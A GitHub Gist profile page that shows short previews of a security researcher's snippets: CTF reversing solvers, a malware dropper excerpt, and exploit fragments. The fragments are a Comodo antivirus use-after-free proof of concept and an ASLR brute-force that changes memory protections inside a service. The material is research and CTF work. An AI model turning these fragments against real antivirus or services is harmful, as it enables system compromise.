Skip to content

Instantly share code, notes, and snippets.

Avatar

Souhail Hammou SouhailHammou

View GitHub Profile
View comodo_av_uaf_poc.c
#include <Windows.h>
#define NTHREADS 5
DWORD WINAPI Thread(LPVOID Parameter)
{
while (1)
CloseHandle(FindFirstChangeNotificationA("C:\\", FALSE, FILE_NOTIFY_CHANGE_FILE_NAME));
}
void main()
{
HANDLE hLastThread;
View Vp_ASLR_bf.c
pid = /*Locate the service's pid with the help of NtQuerySystemInformation*/;
for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
{
Page_cp = Page;
OldProtection = CommunicateServiceVirtualProtect(
pid, //We give the service its own pid
Page, //Address of the page in the service's process
PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes
0x1000
);
View bruteforce.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#define SUMS_SZ 0x10000 * sizeof(int16_t)
#define VM_SZ sizeof(initial_state)
typedef int16_t WORD;
View kvm_solve.py
from idc import *
root = 0x1300
flag = ''
def tobits(s):
result = []
for c in s:
bits = bin(ord(c))[2:]
bits = '00000000'[len(bits):] + bits
View ida_solve.py
# HXP CTF 2017 - revenge_of_the_zwiebel 100 pts
# Writeup link : https://rce4fun.blogspot.com/2017/11/hxp-ctf-2017-revengeofthezwiebel.html
# Souhail Hammou
from idc import *
from idaapi import *
def AddIfNotInDict(dict,index):
if index == -1:
raise Exception("Invalid index value !")
View go_solve.py
#HXP CTF 2017 - dont_panic 100 pts
#Writeup link : https://rce4fun.blogspot.com/2017/11/hxp-ctf-2017-dontpanic-reversing-100.html
#Souhail Hammou
import gdb
CHAR_SUCCESS = 0x47B976
NOPE = 0x47BA23
gdb.execute("set pagination off")
gdb.execute("b*0x47B976") #Success for a given character
gdb.execute("b*0x47BA23") #Block displaying "Nope"
View solve.c
/*
Souhail Hammou
HXP CTF 2017 - Fibonacci 100 pts
Writeup : https://rce4fun.blogspot.com/2017/11/hxp-ctf-2017-fibonacci-reversing-100.html
*/
#include <stdio.h>
#include <stdlib.h>
#define _BYTE unsigned char
#define BYTEn(x, n) (*((_BYTE*)&(x)+n))
View Crackme_RCTF_2017.c
/*
RCTF - 2017
Author : SOUHAIL HAMMOU
Crackme 714 pts (9 solves)
Description :
============
Please submit the flag like RCTF{flag}
https://static2017.teamrois.cn/re_b889ffe02c96c38274f76c67f8a1ddf3/crackme_63074830f0b1b6b4fff6ad910bea34fc.zip
*/
View ndh2017_step4.py
from idc import *
from ctypes import c_uint32
def bruteforce_word(dword1,dword2):
for i in range(0,256) :
for j in range(0,256) :
k = 0
result = c_uint32(0xffffffff)
while k < 2 :
if k == 0 :
View Avtr_dllmain.c
/*2nd level dropper : DLL main function*/
{
/*[...]*/
pavtr_listelem Elem = gList;
while ( Elem != NULL )
{
HANDLE hThread = CreateThread(NULL,NULL,Avtr_ThreadProc,Elem,0);
if ( ! hThread )
break;